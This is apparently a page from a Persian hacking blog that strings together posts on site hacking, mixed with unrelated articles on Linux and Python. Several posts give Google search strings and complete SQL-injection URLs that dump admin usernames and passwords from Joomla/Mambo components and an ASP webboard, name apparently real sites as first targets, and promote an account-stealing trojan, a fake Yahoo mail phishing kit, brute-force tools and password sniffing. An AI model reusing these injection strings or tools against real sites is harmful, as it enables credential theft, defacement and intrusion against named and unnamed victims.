سلام
من برگشتم با متد جديد xss اين متد جديدا توسط يكي از دوستام كشف شده كه سايت هك شده به روش xss رو ميتونيد در zone-h ثبت كنيد .
حالا طرز كارش رو بعدن ميگم.

در قسمت جست و جو يك سايت اين script رو وارد كنيد..سعي كنيد از firefox استفاده كنيد...:

 ۱۷۰ تا فیلم آموزشی با حجم کم عبارت اندازانواع روش های سرور هکینگ.

طريقه دانلود: بر روي لينك كليك كنيد صفحه باز ميشود سپس بر روي كلمه زير كليك كنيد تا دانلود شود:
СКАЧАТЬ

ادامه مطلب

---

             Social Eng         هنر مهندسی اجتماعی        Social Eng                

---

هنر است و ياد گيری اين هنر برای کليه کارمندان و مديران سازمان ها ضرورت دارد تا افشای اطلاعات از

طريق عامل انسان را به صفر برسانند . در اين مقاله به بررسی علمی تفکرات انسان تا تکنيک هايی که

متخصصان نفوذ در کار های خود برای تحريک اشخاص به کار ميگيرند همراه با مثال های جامع پرداخته

ميشود. اگر با اين علم در هيچ حدی آشنايی نداريد پس جالب است بدانيد مهاجمين خبره قادرند بدون هيچ گونه

تماس فيزيکی , به اطلاعات و مستندات حساس شما دسترسی پيدا کنند . آنها با وانمود کردن خود به عنوان

يکی از کارمندان ديگر شعب , شرکا و يا حتی کارمند بخش های داخلی سازمان , تلاش ميکنند تا با اغفال افراد و تحريکآنها با تکنيک های خاص خود که به توضيح مفصل در مورد آن خواهم پرداخت بپردازند .

DOWNLOAD

متا اسپلویت یک ابزار تست نفوذپذیری است.که به کار بر اجازه میدهد برای یک باگ، اکسپلویت مورد نظر را بسازد.

آخرین نسخه از متا 3.1 میباشد که در http://www.metasploit.com موجود است.توضیحات اضافی و آموزش کامل در مقاله....

Dwonload

گنو/لینوکس با ویندوز چه تفاوتی دارد؟

یکی از نخستین سوالاتی که در ذهن هر کاربری که به تازگی نام گنو/لینوکس به گوشش خورده است، مطرح می‌شود، این است که خوب گنو/لینوکس چه تفاوتی با ویندوز دارد؟ من در این مقاله قصد دارم بدون اینکه وارد مسائل خیلی فنی شوم، به طور اجمالی این موضوع را تشریح کنم.

لینوکس چیست؟
لینوکس به خودی خود، یک هسته (Kernel) است. هسته، بخش اصلی سیستم‌عامل را تشکیل می‌دهد که کار آن کنترل داده‌ها، مدیریت حافظه، سخت‌افزار، ورود و خروج داده‌ها و تمامی موارد اصلی سیستم‌عامل می‌باشد. همانطور که گفتم، لینوکس به خودی خود سیستم‌عامل به شمار نمی‌رود، بلکه با استفاده از ابزارهایی که پروژه گنو (GNU) برای آن تولید کرده است، تبدیل به یک سیستم‌عامل کامل می‌شود (به همین دلیل است که لینوکس را معمولا گنو/گنو/لینوکس یا GNU/Linux می‌نامند) و با اضافه کردن سایر نرم‌افزارهای بازمتن به آن، می‌توان از آن در موارد متعددی مانند سرویس‌دهنده‌ها، ایستگاه‌های کاری، کامپیوترهای روی‌میزی، ابر رایانه‌ها، ابزارهای صنعتی و پزشکی که دارای سیستم‌های درونه‌ای (Embedded) می‌باشند و... استفاده کرد.

ادامه مطلب

سلام دوستان!
امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو  گذاشتم!

این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای مدیریت محتوای (com_galeria) هستند به هک پسورد ادمین این قبیل سایت ها بپردازید!

خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:

com_galeria

حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:

index.php?option=com_galeria&Itemid=S@BUN&func=detail&id
=-999999/**/union/**/select/**/0,0,password,111,222,333,0,0,0,0,0
,1,1,1,1,1,1,444,555,666,username/**/from/**/users/*

حال مشاهده خواهید کرد که پسورد های ادمين سایت را به صورت Encode شده در اختیار شما قرار داده می شود و شما می توانید به وسیله یک برنامه Encode پسورد های اصلی را به دست آورید!

مثال:

سلام دوستان!
امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو  گذاشتم!

این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای مدیریت محتوای (com_clasifier) هستند به هک پسورد ادمین این قبیل سایت ها بپردازید!

خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:

com_clasifier

یا

com_clasifier cat_id

حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:

index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*

حال مشاهده خواهید کرد که پسورد های ادمين سایت را به صورت Encode شده در اختیار شما قرار داده می شود و شما می توانید به وسیله یک برنامه Encode پسورد های اصلی را به دست آورید!

مثال:

http://www.fernando-heitor.de

سلام دوستان!
امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو  گذاشتم!

این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای مدیریت محتوای (com_portfolio) هستند به هک یوزر و پسورد کاربران این قبیل سایت ها بپردازید!

خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:

index.php?option=com_portfolio

حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:

index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*

حال مشاهده خواهید کرد که پسورد های کاربران سایت را به صورت Encode شده در اختیار شما قرار داده می شود و شما می توانید به وسیله یک برنامه Encode پسورد های اصلی را به دست آورید!

مثال:

http://www.inta.org

سلام دوستان!
امروز می خوام تو این پست یه باگ خیلی جدید که یه دو سه روزی از انتشار اون تو اینترنت می گذره رو بهتون معرفی کنم که شما از طریق اون می تونید به آسونی آب خوردن پسورد ادمین سایت های (webboard question.asp) بدون اینکه اینکود شده باشد رو بیرون بیارید و اونو به نام خودتون هک کنید و حتی متن و عکس های دلخواه خودتون رو تو سایت با نام خودتون و تو صفحه اصلی سایت قرار یدین و حتی پسورد سایت را به صورت دلخواه تغییر دهید و به طور کلی بگم که می تونید در یک کلام قسمت مدیریت سایت رو هک کنید!

خوب شما برای هک این سایت ها ابتدا عبارت زیر را در گوگل جستجو کنید:

webboard question.asp QID

حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:

question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2,username,password,5,password,7,8,9,null%20+%20from%20+%20+%20administrator%20';';

حال مشاهده خواهید کرد که پسورد های ادمين سایت را بدون اینکه اینکود شده یاشه در اختیار شما قرار میده!

حال جهت ورود به قسمت مدیریت سایت با همون Adminstrator باید از طریق لینک زیر اقدام نمائید که به جای عبارت xxx نام سایت مورد نظر را قرار دهید:

http://www.xxx.com/webboard/admin/login.asp

برای مثال می توانید در اولین قدم سایت های زیر رو هک کنید:

http://www.siam-handicrafts.com

http://www.boonmeeherb.com

امیدوارم که از این آموزش به نحو احسنت و در جهت مفید استفاده کنید!

این هم فیلم آموزشی هک کردن سایت های php به روش جدید است.

 فیلم آموزشی باگ جدید Phpnuke متود جدید

يكي از پر استفاده ترين محيط هاي كاري براي بسياري از سرورهاي وب در چند سال اخير IIS
بوده است . به همين دليل هميشه يك هدف عالي براي نفوذگران وب مي باشد . اين سرور
سوراخهاي امنيتي ب سيار زيادي داشت و دارد و همين امر باعث شده است بسيار مورد حمله
نفوذگران وب قرار گيرد از اين گونه ضعفهاي امنيتي مي توان ، ضعفهاي امنيتي آشكار سازي
آشكار سازي اطلاعات به وسيله اسكريپتهاي ، ::$DATA كد اصلي برنامه ها شبيه
اجراي دستورات سيستمي از طريق تزريق كردن دستورات در پرس و ، showcode.asp
را نام برد . اگر چه IIS و حملات سرريزي بافر روي ( MDAC / RDS ) جوهاي پليگاه داده
اين نوع ضعفهاي امنيتي توسط پچ هايي كه ارائه شده اند و همچنين در نسخه هاي جديد رفع
شده اند البته بايد گفت كه محصولات جديد ارائه شده با نظم بهتر ارائه شده اند.
را مي توان در دو گروه زير دسته بندي كرد: IIS بيشتر ضعفهاي امنيتي
IIS - حمله عليه مولفه هاي
IIS - حمله عليه خود

DOWNLOAD

با سلام"

يكي از روش هاي مرسوم در هكينگ روش BruteForce هست كه در اين روش هكر با استفاده از يك ليست Dictionary اقدام به حدس زدن كلمات عبور مي كند. در بعضي اوقات ممكن هست مدير يك سرور پسورد سيستم و يا Router و در كل Device هايي كه بر روي سرور نصب هستند و براي مديريت آنها پسوردي لازم هست را ٿراموش كند و با هيچ راهي نتواند آن پسوردها را دوباره بدست بياورد. در اين مواقع آخرين راه استٿاده از يك نرم اٿزار BruteForce هست كه بتواند با چك كردن كلمات مختلٿ, پسورد مورد نظر را حدس بزند. در اين قسمت چون مربوط به روترهاي Cisco هست مي خواهم چند ابزار براي BruteForce كردن روترهاي Cisco معرٿي كنم كه هم مي توانيد در جهت اهداٿ هك و هم در جهت هدٿ هاي امنيتي از آنها استٿاده كنيد.

برنامه های زیادی برای این کار وجود دارد که میتوان به وسیله ای آنها این Attack رو انجام داد برنامه های که تک منظوره با Perl نوشته می شوند که نمونه این برنامه ها زیاد و اون طور که باید کار کنند ، نمی کنند .

Brutus : یکی از قویترین برنامه ها برای انجام BruteForce Attack رو انجام داد :

شکل برنامه رو می تونید از لینک زیر تماشا کنید :


این برنامه قادر به انجام حملاتی همچون :

1.HTTP
2.FTP
3.POP3
4.TelNet
5.SMB (NetBios)
6.Custom
7.Cisco Router

خوب پس از همین جا می تونیم بفهمیم که چه برنامه ای با قابلیتی می باشد .

Dictionary : خوب بیشتر به طور آماده می توان آنها رو تهیه کرد ولی خوب امکان کار کردنش خیلی کمه . برای این کار ما باید یک Dictionary برای سایت که مورد هدف است استفاده کنیم یعنی بنویسیم این کار رو می تونیم از اطلاعاتی که داریم بکنیم .

یک نمونه کوتاه از یک Dictionary :


و یا هر چی که شما بگید .

می توانید برنامه و یک User list و یک Pass list رو از لینکهای زیر دانلود :


خوب در پست دیگه برای شما اگه بتونم یک آموزش تصویری آماده میکنم در غیر این صورت یه آموزش در مورد حمله به FTP با Pass list ای که خودمان درست کردایم رو می گم .

باز هم مثل همیشه امیدوارم که از این آموزش بهره ای کامل رو برده باشید .

.:!موفق باشید!:.

چرا پیتون ؟

کاردینال بیگلز، اریک بی ایمان را بیش از چهار ساعت روی صندلی راحتی نشاند تا سرانجام این اعترافات را از او گرفت ...

اولین نگاه من به پیتون یک تصادف بود، و علاقه چندانی به چیزی که در آن زمان دیدم پیدا نکردم. اوایل سال 1997 بود و کتاب "برنامه نویسی پیتون" نوشته مارک لوتز از انتشارات O'reilly به تازگی بیرون آمده بود. کتابهای O'reilly به ندرت به در خانه من می‌رسند، که در آن مورد هم توسط یک فرد ذینفع درون سازمان طی یک فرآیند تصادفی که من تصمیم گرفته‌ام دیگر سعی در فهمیدن آن نکنم، از بین تازه‌های چاپ برای من فرستاده می‌شوند.

یکی از این کتابها "برنامه نویسی پیتون" بود. از آنجا که من زبان‌های رایانه‌ای را جمع آوری می‌کنم، این موضوع برایم جالب بود. من بیش از دوجین زبان همه منظوره بلدم، برای تفریح مفسر و مترجم‌های زیادی نوشته‌ام و شخصا تعدادی زبان‌های یک منظوره و فرمهای نشانه گذاری (Markup) مختلف طراحی کرده‌ام. تازه‌ترین پروژه‌ای که من در زمان نوشتن این مقاله به پایان رسانده‌ام، یک زبان یک منظوره به نام SNG برای کار کردن روی تصاویر PNG یا Portable Network Graphics است. خوانندگان علاقمند می‌توانند صفحات خانگی SNG را در آدرس http://www.catb.org/~esr/sng مشاهده کنند. من همچنین چند نسخه پیاده سازی شده از چند زبان همه منظوره عجیب را در صفحه Retrocomputing Museum خود به آدرس http://www.catb.org/retro قرار داده‌ام.

من قبلا آنقدر درباره پیتون شنیده بودم که بدانم از آن چیزهایی است که امروزه به آنها زبانهای اسکریپت می‌گویند، یک زبان تفسیری با مدیریت داخلی (built-in) حافظه و تسهیلاتی خوب برای فراخوانی و همکاری با دیگر برنامه‌ها. بنابراین در هنگام شروع پیتون یک سوال بالاتر از همه مسائل برای من مطرح بود: این زبان چه چیزی دارد که پرل ندارد؟

البته، پرل گوریل ۸۰۰ کیلویی زبان‌های اسکریپت امروزی است. این زبان تا حدی به لطف کتابخانه‌های یونیکس و اعلان‌های جامع خود و تا حدی به دلیل مجموعه بزرگ ماژول‌های به وجود آمده توسط جامعه برنامه نویسان پرل ، به نسبت زیادی جایگزین زبانهای اسکریپت انتخابی مدیران و ناظران سیستم‌ها شده است. این زبان، زبان CGI پنهان در پشت حدود ۸۵% محتوای "زنده" بر روی شبکه به شمار می‌رود. سازنده آن، Larry Wall، به درستی یکی از مهمترین رهبران جامعه متن باز به شمار می‌رود و اغلب پس از Linus Torvalds و Richard Stallaman در مکان سوم جایگاه خدایان قرار می‌گیرد.و.......

ادامه مطلب

این تروجان که کارایی بیشتر از انچه فکرشو میکنید داره مثلآ:

ارسال پسورد یاهو 8 نسخه الفا

ارسال اکونت ADSL

قابلیت جایگزاری ویروس در فلاپی قربانی

ارسال یوزر بلاگفا

ارسال یوزر بلاگ اسکای

ارسال یوزر بلاگفا

و قابلیت غیر فعال کردن چند انتی ویروس بزرگ و محبوب

و کلی قابلیت که در کمتر تروجانی میبینید

دانلود

جهت کسب اطلاعات بیشتر فایل ضمیمه را ازش سوء استفاده کنید
توی سورس اولی من پیش فرض را گذاشته بودم که registerGlobal توی php فعاله
( خدا میدونه چند نفری که میگفتن کار نمیده و من هی میگفتم کار میده الان چقدر فحشم میدن

یه کم تغییر کرد تا بتونه روی هاست هایی که رجیستر گلوبال هم غیر فعاله کار کنه
yahoo-mail-fake.rar (29.1 KB, 176 views)

امروزه تعداد سايتهاي وب و برنامه هاي كاربردي آنها به سرعت در حال افزايش مي
باشد و شايد تا چند سال قبل هيچكس پيش ب يني اين وضعيت را نمي كرد . امروزه تقريبا
بسياري از صنايع و حرفه ها از اينترنت و وب استفاده مي كنند . و خيلي از حرفه ها و
صنايع به وسيله وب ايجاد شده اند . در يكي از مقالاتي كه راجع به شغلهايي كه توسط
اينترنت ايجاد شده است، مطالعه مي كردم و اين مساله در ذهنم آ مد كه كلاهبرداري هاي
امروزي نيز عوض شده و شايد بتوان گفت كه ديگر دزدان امروزي آدمهاي لات و اوباش
كنار خيابان نمي باشند ، بلكه آدمهاي بسيار باهوش و تيزبين ، با معلوماتي كه شايد يك
مهندس كامپيوتر و يا مدير يك شبكه به ندرت با آنها آشنا باشد !!! و اين مساله خيل ي
جالب مي باشد كه همراه با پيشرفت علم كامپيوتر و حرفه اي تر شدن برنامه هاي
كاربردي ، نفوذگران وب هم پيشرفت مي كنند . البته اين را هم بايد بگويم كه اين نفوذگران
هرچند باعث خرابكاري هايي مي شوند ولي نمي توان از تلاش بعضي از آنها در گسترش
و پيشرفت اينترنت و وب چشم پوشي كردو.....

به دلیل روش های متعددی که در هک وبلاگ وجود دارد ساختن فیلم آموزشی آن دشوار است.
به همین دلیل تمام روش های blog-hacking در این مقاله آمده است!!

این یکی از نرم افزار دیگر برای اسنیف کردن شبکه و پکتها.که خیلی قوی است و به در خواست یکی از دوستان گذاشتیم.
این پکت اسنیفر در هک وبلاگ هم استفاده میشه!!!برای دانلود کار با این اسنیفر اینجا را کلیک کنید.
فعلا بای.

می خواستم فیلمشو خودم بسازم وقت نداشتم.

چون آقا بهزاد چند بار درخواست کرداین فیلمو تهیه کردم.

 

اسنیف کردن شبکه

کار با منو ها و تنظیمات اسنیفر

حل کردن مشکل آداپر !!

آنالیز کردن پک های به دست اماده از اسنیفر !

و .....

 

همه توضیحات لازم در فیلم داده شده .

میتونید فیلم رو از لینک زیر دانلود کنید و حالیشو ببرید ::

 

 download video

 

اما دو تا نکته ای که باقی میمونه که قبلا هم گفتم . اونم اینه که برای این که بتونید با اسنیفر ها چیزی رو هک کنید (پسوردش رو به دست بیارید) باید دو تا شرط زیر رو رعایت کنید ::

اول این که دسترسیتون به سرور به صورت ریموت باشه (یعنی بتونید تو سرور کاری بکنید !!)

دوم این که تو یه شبکه محلی باشید ( مثلا توی سرور مدرستون این کار رو میکنید و اسنیف میکنید و پسورد های زده شده در اون شبکه رو به دست میارید )